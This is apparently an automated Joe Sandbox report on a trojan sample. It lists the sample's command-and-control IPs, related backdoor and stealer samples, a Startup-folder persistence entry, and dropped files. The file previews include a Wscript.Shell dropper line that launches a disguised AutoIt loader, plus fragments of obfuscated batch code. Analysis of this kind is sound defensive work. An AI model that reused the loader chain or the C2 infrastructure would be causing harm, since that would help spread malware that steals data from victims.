                            http://91.212.166.91http://46.8.232.106Soldiers.pif, 00000016.00000002.2716944772.000000000A8AE000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000AC50000.00000004.00001000.00020000.00000000.sdmpfalse
                              		unknown
                              https://www.autoitscript.com/autoit3/Soldiers.pif, 0000000B.00000003.1514078352.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9A6000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2717920213.000000000A9C7000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2715810189.000000000A862000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif, 00000016.00000002.2716944772.000000000A8BA000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACE2000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD3C000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACAC000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2718265505.000000000ADB6000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2715876792.000000000ACC9000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD4D000.00000004.00001000.00020000.00000000.sdmp, ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD2A000.00000004.00001000.00020000.00000000.sdmp, Soldiers.pif.2.dr, ChameleonCraft.scr.11.dr, Analyses.0.drfalse
                                		unknown
                                http://91.212.166.91ChameleonCraft.scr, 00000017.00000002.2717881748.000000000AD28000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  46.8.232.106
                                  		unknownRussian Federation
                                  		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                  94.103.85.114
                                  		unknownRussian Federation
                                  		48282VDSINA-ASRUtrue
                                  93.185.159.253
                                  		unknownRussian Federation
                                  		39912I3B-ASATfalse
                                  91.212.166.91
                                  		unknownUnited Kingdom
                                  		35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                                  46.8.236.61
                                  		unknownRussian Federation
                                  		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1533857
                                  Start date and time:2024-10-15 09:37:25 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 30s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:25
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:sV9ElC4fU4.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:bf53f19b542df72aacf589a049619bc7.exe
                                  Detection:MAL
                                  Classification:mal100.troj.expl.evad.winEXE@32/12@2/5
                                  EGA Information:
                                  • Successful, ratio: 33.3%
                                  HCA Information:
                                  • Successful, ratio: 79%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 378
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target ChameleonCraft.scr, PID 3900 because there are no executed function
                                  • Execution Graph export aborted for target Soldiers.pif, PID 7096 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: sV9ElC4fU4.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  03:38:27API Interceptor1x Sleep call for process: sV9ElC4fU4.exe modified
                                  03:38:32API Interceptor31x Sleep call for process: Soldiers.pif modified
                                  03:38:47API Interceptor33x Sleep call for process: ChameleonCraft.scr modified
                                  09:38:33AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChameleonCraft.url

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  46.8.232.106antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                  • 46.8.232.106/
                                  94.103.85.114antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    93.185.159.253antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/
                                    GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253/

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsantispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.236.61
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.236.61
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.236.61
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 46.8.236.61
                                    2efOvyn28p.exeGet hashmaliciousStealc, VidarBrowse
                                    • 46.8.231.109
                                    20fUAMt5dL.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 46.8.231.109
                                    SKGOzZRZGX.exeGet hashmaliciousStealcBrowse
                                    • 46.8.231.109
                                    SecuriteInfo.com.Trojan.DownLoader47.43340.12576.1316.exeGet hashmaliciousStealcBrowse
                                    • 46.8.231.109
                                    lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 46.8.231.109
                                    FdjDPFGTZS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • 46.8.231.109
                                    VDSINA-ASRUantispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 94.103.85.114
                                    5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                    • 94.103.90.9
                                    5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                    • 94.103.90.9
                                    GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                    • 94.103.90.9
                                    Implosions.exeGet hashmaliciousRedLineBrowse
                                    • 109.234.38.212
                                    aisuru.arm.elfGet hashmaliciousUnknownBrowse
                                    • 94.103.83.102
                                    PQ2AUndsdb.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                                    • 62.113.117.95
                                    SecuriteInfo.com.Win32.PWSX-gen.663.14886.exeGet hashmaliciousXRed, XWormBrowse
                                    • 62.113.117.95
                                    SecuriteInfo.com.BackDoor.AsyncRATNET.1.5719.7945.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                    • 62.113.117.95
                                    ExeFile (88).exeGet hashmaliciousRedLineBrowse
                                    • 94.103.86.184
                                    MOBILY-ASEtihadEtisalatCompanyMobilySAhttp://www.valcorcre.comGet hashmaliciousUnknownBrowse
                                    • 91.212.166.21
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 91.212.166.91
                                    na.elfGet hashmaliciousMirai, GafgytBrowse
                                    • 37.240.54.95
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 91.212.166.91
                                    na.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 176.18.57.22
                                    na.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 37.16.45.237
                                    na.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 176.225.179.248
                                    na.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 62.120.34.75
                                    na.elfGet hashmaliciousMiraiBrowse
                                    • 31.167.93.113
                                    ULRmk7oYR7.elfGet hashmaliciousMiraiBrowse
                                    • 46.230.84.61
                                    I3B-ASATantispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    3wtD2jXnxy.exeGet hashmaliciousRedLine, STRRATBrowse
                                    • 93.185.156.125
                                    5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                    • 93.185.159.253
                                    3DF6fqp3ME.elfGet hashmaliciousMiraiBrowse
                                    • 78.142.79.102
                                    q5C2tw1Pc6.elfGet hashmaliciousMiraiBrowse
                                    • 37.186.3.143

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scrLz1uWbvPmZ.exeGet hashmaliciousUnknownBrowse
                                      cW5i0RdQ4L.exeGet hashmaliciousUnknownBrowse
                                        cW5i0RdQ4L.exeGet hashmaliciousUnknownBrowse
                                          67079aecc452b_xin.exeGet hashmaliciousUnknownBrowse
                                            6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                              hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse
                                                file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                  M13W1o3scc.exeGet hashmaliciousStealcBrowse
                                                    down.exeGet hashmaliciousUnknownBrowse
                                                      file.exeGet hashmaliciousLummaCBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.js

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):195
                                                        Entropy (8bit):4.766523611391474
                                                        Encrypted:false
                                                        SSDEEP:6:RiJBJHonwWDmLJkD/KK0DQsZhHFywWDmLJkD/KK0Dl:YJ7QjqCKzDjZhHoqCKzDl
                                                        MD5:54E2C4332B8FCAE7E1DE6D5150893571
                                                        SHA1:F3C9DB07B919C2B98728E7D4C112F2F87A593EA8
                                                        SHA-256:2CE8AD9F3E366777019CE15115ED6B6FD56D1A75B05BCA763DBB70925E33CB7A
                                                        SHA-512:C75E2AF931F1D32AEAF9AD7A90A3A5F55D97CE4B661CD445133BCC7A72175D1E8BAA05655C0D2B30796D663B1C85EE74987FC3022B04A66155C274F37464FB09
                                                        Malicious:true
                                                        Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\DesignQuantum Innovations\\ChameleonCraft.scr\" \"C:\\Users\\user\\AppData\\Local\\DesignQuantum Innovations\\q\"")

                                                        C:\Users\user\AppData\Local\DesignQuantum Innovations\ChameleonCraft.scr

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):893608
                                                        Entropy (8bit):6.62028134425878
                                                        Encrypted:false
                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Joe Sandbox View:
                                                        • Filename: Lz1uWbvPmZ.exe, Detection: malicious, Browse
                                                        • Filename: cW5i0RdQ4L.exe, Detection: malicious, Browse
                                                        • Filename: cW5i0RdQ4L.exe, Detection: malicious, Browse
                                                        • Filename: 67079aecc452b_xin.exe, Detection: malicious, Browse
                                                        • Filename: 6706e721f2c06.exe, Detection: malicious, Browse
                                                        • Filename: hlyG1m5UmO.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: M13W1o3scc.exe, Detection: malicious, Browse
                                                        • Filename: down.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\DesignQuantum Innovations\q

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):7088789
                                                        Entropy (8bit):7.999975582171975
                                                        Encrypted:true
                                                        SSDEEP:98304:qIF9RLNMbnpAeNKOneq/uwGVip1R/ZORy+LbmYLoC31haQj4PN+iXdHsKewkvP8x:q+9RLuKOeRVkZOvKYL3Fhl8+zAx
                                                        MD5:F4C2F38A3EEC031AF4618C5D74DD4AAD
                                                        SHA1:DE6379793A7315784321C7AF504A52090B153967
                                                        SHA-256:9BD49F96FC0B3A7143FD550B2D550DDF151E438BDF15514A065E7F287D076DBD
                                                        SHA-512:939E0108944B5D1F510AA964EEFF4B3DDDEAC57B632FBB977189010D908FDD07E5D2D0CBB63A611997BE898768E86749E7821EC1A84259441EEADAD37D1F08EA
                                                        Malicious:false
                                                        Preview:=t..Pr........K..-]....yE\d".-..X..A.R. .Y....:[.>}..*b.,*..m....{....h]K..y...<<\DI.j.%.w.(..6(.d...#.u...0M..Ll.....\4{?.Co...V.Q...i.rE.;...6..m....J.c5.p".M...<.b..=rkp!<.?.Y....U.pX.(3..#..P...?Y.....o(.h...nd8.c.QG]ZWqH.4.oF..Z55L.../h.=..".s....#.'.O......../...W.!.._...~x...+G..$..z;.......=c.3.h...uMq.A...Sj1.P.<.f....{s[]..F\....TT.....^y......a......t....... ......m...Hv..m..5..._...FRk..~..+.z..;.T........f..M#.............H......K4....W.........4..s..N....a.."R...3.!hX#...L..s.....`aX..\..n.*+l%...O..cBPOW_.+aF.PG.....k-J..H....tF....GY3..?(l.....P..d....?.W.;....Af..x..Q.d.)....S..I..$1.'.V0.9..I.2.....A....zD(}X.....t..P#_ .*U{.v....r.xir.........%...O ..r....}..8..;./...1m...j.......KQ......|6".l......*k.....0......T..*.7...7..DZj7..-.y-.A.6.Y..(.Z.].....h{>$|.8...o..)...*N.1...,...4%.h..#... ....j=.t..4.7.4.O...VV/....GX.....1.-.efh-3..K.bj.w'.<.......u..r..AW`..i/)".5....\.z..3...2..-#.A...S..E...s..w!.6O..x.;

                                                        C:\Users\user\AppData\Local\Temp\353685\D

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):7088789
                                                        Entropy (8bit):7.999975582171975
                                                        Encrypted:true
                                                        SSDEEP:98304:qIF9RLNMbnpAeNKOneq/uwGVip1R/ZORy+LbmYLoC31haQj4PN+iXdHsKewkvP8x:q+9RLuKOeRVkZOvKYL3Fhl8+zAx
                                                        MD5:F4C2F38A3EEC031AF4618C5D74DD4AAD
                                                        SHA1:DE6379793A7315784321C7AF504A52090B153967
                                                        SHA-256:9BD49F96FC0B3A7143FD550B2D550DDF151E438BDF15514A065E7F287D076DBD
                                                        SHA-512:939E0108944B5D1F510AA964EEFF4B3DDDEAC57B632FBB977189010D908FDD07E5D2D0CBB63A611997BE898768E86749E7821EC1A84259441EEADAD37D1F08EA
                                                        Malicious:false
                                                        Preview:=t..Pr........K..-]....yE\d".-..X..A.R. .Y....:[.>}..*b.,*..m....{....h]K..y...<<\DI.j.%.w.(..6(.d...#.u...0M..Ll.....\4{?.Co...V.Q...i.rE.;...6..m....J.c5.p".M...<.b..=rkp!<.?.Y....U.pX.(3..#..P...?Y.....o(.h...nd8.c.QG]ZWqH.4.oF..Z55L.../h.=..".s....#.'.O......../...W.!.._...~x...+G..$..z;.......=c.3.h...uMq.A...Sj1.P.<.f....{s[]..F\....TT.....^y......a......t....... ......m...Hv..m..5..._...FRk..~..+.z..;.T........f..M#.............H......K4....W.........4..s..N....a.."R...3.!hX#...L..s.....`aX..\..n.*+l%...O..cBPOW_.+aF.PG.....k-J..H....tF....GY3..?(l.....P..d....?.W.;....Af..x..Q.d.)....S..I..$1.'.V0.9..I.2.....A....zD(}X.....t..P#_ .*U{.v....r.xir.........%...O ..r....}..8..;./...1m...j.......KQ......|6".l......*k.....0......T..*.7...7..DZj7..-.y-.A.6.Y..(.Z.].....h{>$|.8...o..)...*N.1...,...4%.h..#... ....j=.t..4.7.4.O...VV/....GX.....1.-.efh-3..K.bj.w'.<.......u..r..AW`..i/)".5....\.z..3...2..-#.A...S..E...s..w!.6O..x.;

                                                        C:\Users\user\AppData\Local\Temp\353685\Soldiers.pif

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:modified
                                                        Size (bytes):893608
                                                        Entropy (8bit):6.62028134425878
                                                        Encrypted:false
                                                        SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                        MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                        SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                        SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                        SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\Actively

                                                        Download File
                                                        Process:C:\Users\user\Desktop\sV9ElC4fU4.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):2409
                                                        Entropy (8bit):5.351047962632722
                                                        Encrypted:false
                                                        SSDEEP:48:wn4xqtUzrCrt+ikNv9mJHWxPrhBlA1FygzqyIsJj/G09CAi6n:1xgUzr4tgOwVAfBzDICS09CAi6n
                                                        MD5:06A4F03A0D80DEB5EDFAEE069AFB1F8F
                                                        SHA1:BBC6F4084EADF3B5F851534453D07C134E5D6FCE
                                                        SHA-256:91826892A20C4FB2589D0D4E7B58979BCAF5FCABE6C2885C112B44C924CBFFCC
                                                        SHA-512:F86D3C641C664DA2BEFD12A836D9235C64359B226123FDF5F3FB07E558004F3B00F4318A498CC4C987A86466027544EE06ABDDCEF5E0C16D035B5DC748759F80
                                                        Malicious:false
                                                        Preview:WirelessNeilAspBringing..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.......................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\Analyses

                                                        Download File
                                                        Process:C:\Users\user\Desktop\sV9ElC4fU4.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):891224
                                                        Entropy (8bit):6.62238564269249
                                                        Encrypted:false
                                                        SSDEEP:12288:OpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:OTxz1JMyyzlohMf1tN70aw8501
                                                        MD5:88B9D404B8CE6769BDB42F055702288B
                                                        SHA1:D28CA8B70E36EDA2DAC9DF1FFDC5C74F2F3BD2F5
                                                        SHA-256:D5D974471251DD18F21DE604563B8D0648EFC503700D95A314922497847C7616
                                                        SHA-512:E838054EC000242D8E3D9DA070863C35E9CC86A6254B6FA01FF7CF9CF4A5934BACC3AE50103D32708E9B770296B7597F1782FE99647F4DFA33C3325E208B82E9
                                                        Malicious:false
                                                        Preview:4.^8.^<.^@.^D.~H.~L.^P.....^d..^h.^p.^x.F|....f......f......f......f......f............_..................^[.U..V..W3.j.9~.t......Y..t..u....L......F..G..F..x..F..~._^]........Y..t..u...........>..V...6.:...V.4...YY..^...U..S..j..c...c......Y..t.V.u.W....._^....[]...3...U..].d...U......wL.V.u.WV.`......xL.....8....u/;u........E....E.........Q.u.j V....I._^..]....w..e...3.@..U....W.}....t.V.u.9=txL........dxL..........E..e...e...pxL..=txL..5xxL..}....uej.j..M.QPV....I.P.u..dxL.....I..=lxL...hxL.u..u...(.I...lxL..^.}.._t..}..t.j..u..,...P.u.....I...]..........U..=lxL..t%.u.....I..}....lxL..tG.}..tA.u...L.I..hxL...t+P.u.....I..5dxL..%hxL......I..%dxL....txL..]....u.....I..U... S.].3.V.u.3.Wj._@.E...M..}..E......e..Pj.WQV.....{..~j.U.K..C..M..E..8...........M.....Y.....2......t\HH.....HH......HH..1....}..E.E..M.....U....E..M.;S.|..[..E.M.....p...WV......E._^[..]....}...}.t.WV.....E..8.t!...E..M..9.t..9.}..u.j.WPV......E...U.....e..SVW.}.3.C.E.....W.]...(.I..u...lxL..

                                                        C:\Users\user\AppData\Local\Temp\Min

                                                        Download File
                                                        Process:C:\Users\user\Desktop\sV9ElC4fU4.exe
                                                        File Type:ASCII text, with very long lines (361), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):9855
                                                        Entropy (8bit):5.052596347684877
                                                        Encrypted:false
                                                        SSDEEP:96:OKSFNXc2jCeXlsHtFFbjRRzGbUbGiyCdJK7gkLpvvzMbZ4NSKKAmaSxlyUn+5a1o:iTc2mPtDOK0AJK71g6NDw7TZS41peku
                                                        MD5:C2A3A2FFD0E419F6754B82AE78B9E37B
                                                        SHA1:0D7E37F0326F962C2EB2D78D9980A7846D77546C
                                                        SHA-256:7A69B3CCB8501D914F127E44F94F7545B18DD77175E0E5778CDB054A82DD107C
                                                        SHA-512:049C90C03B746C8F4166C8E45720557E66B2132CD3826BE8DD87DD981FE7638F57A7B475D384F1C9CF803103642E4FD1C5E8A2D5667BBE32CEB3542457BEB80A
                                                        Malicious:false
                                                        Preview:Set Fbi=6..PMKNPhiladelphia Which Demands Friendly Ky Glenn ..CtSword Drum Manufacturing ..fwLocked Regardless ..CYbMGoto Create Cnetcom Interracial Standing ..boAgainst Illustration Heads Pasta Howard Amino Doom Generous Rpg ..LGFTwiki P Ol Cottages ..Set Watson=k..JBSignup Borders Clips Yamaha Base ..icNe ..SGCtMaterials Clip Continuity Antenna Act Undo Saudi ..jRkWDecide Territory Fault Titled Tonight ..dTgfDiane Essential Leisure Address Food ..qtDiverse Going ..mmmTEconomy Resolutions Deutsch ..lWProspects Participation Vietnam Quotations Publications Rotary Spectrum Doe ..IOKvLoc Cnetcom Skating Ceo Situations Criticism Station ..SccXMorgan ..Set Logan=R..ezHQt Brings Effectiveness ..avuSku ..PbCNHq Success Grad Purchases Al Prove ..CfNORemoval Sims Calgary ..dPnQLouise ..Set Rule=o..LYwKKuwait Indeed Signed Uses Oldest Player ..IFFMls Words Nylon Moms Cnetcom Gage Cooked Primarily Voltage ..ItXThunder Belarus Transmitted Treatments Embedded ..NRJhInbox Set Consoles ..tHpTeenage

                                                        C:\Users\user\AppData\Local\Temp\Min.bat (copy)

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:ASCII text, with very long lines (361), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):9855
                                                        Entropy (8bit):5.052596347684877
                                                        Encrypted:false
                                                        SSDEEP:96:OKSFNXc2jCeXlsHtFFbjRRzGbUbGiyCdJK7gkLpvvzMbZ4NSKKAmaSxlyUn+5a1o:iTc2mPtDOK0AJK71g6NDw7TZS41peku
                                                        MD5:C2A3A2FFD0E419F6754B82AE78B9E37B
                                                        SHA1:0D7E37F0326F962C2EB2D78D9980A7846D77546C
                                                        SHA-256:7A69B3CCB8501D914F127E44F94F7545B18DD77175E0E5778CDB054A82DD107C
                                                        SHA-512:049C90C03B746C8F4166C8E45720557E66B2132CD3826BE8DD87DD981FE7638F57A7B475D384F1C9CF803103642E4FD1C5E8A2D5667BBE32CEB3542457BEB80A
                                                        Malicious:false
                                                        Preview:Set Fbi=6..PMKNPhiladelphia Which Demands Friendly Ky Glenn ..CtSword Drum Manufacturing ..fwLocked Regardless ..CYbMGoto Create Cnetcom Interracial Standing ..boAgainst Illustration Heads Pasta Howard Amino Doom Generous Rpg ..LGFTwiki P Ol Cottages ..Set Watson=k..JBSignup Borders Clips Yamaha Base ..icNe ..SGCtMaterials Clip Continuity Antenna Act Undo Saudi ..jRkWDecide Territory Fault Titled Tonight ..dTgfDiane Essential Leisure Address Food ..qtDiverse Going ..mmmTEconomy Resolutions Deutsch ..lWProspects Participation Vietnam Quotations Publications Rotary Spectrum Doe ..IOKvLoc Cnetcom Skating Ceo Situations Criticism Station ..SccXMorgan ..Set Logan=R..ezHQt Brings Effectiveness ..avuSku ..PbCNHq Success Grad Purchases Al Prove ..CfNORemoval Sims Calgary ..dPnQLouise ..Set Rule=o..LYwKKuwait Indeed Signed Uses Oldest Player ..IFFMls Words Nylon Moms Cnetcom Gage Cooked Primarily Voltage ..ItXThunder Belarus Transmitted Treatments Embedded ..NRJhInbox Set Consoles ..tHpTeenage

                                                        C:\Users\user\AppData\Local\Temp\Skirts

                                                        Download File
                                                        Process:C:\Users\user\Desktop\sV9ElC4fU4.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):7088789
                                                        Entropy (8bit):7.999975582171975
                                                        Encrypted:true
                                                        SSDEEP:98304:qIF9RLNMbnpAeNKOneq/uwGVip1R/ZORy+LbmYLoC31haQj4PN+iXdHsKewkvP8x:q+9RLuKOeRVkZOvKYL3Fhl8+zAx
                                                        MD5:F4C2F38A3EEC031AF4618C5D74DD4AAD
                                                        SHA1:DE6379793A7315784321C7AF504A52090B153967
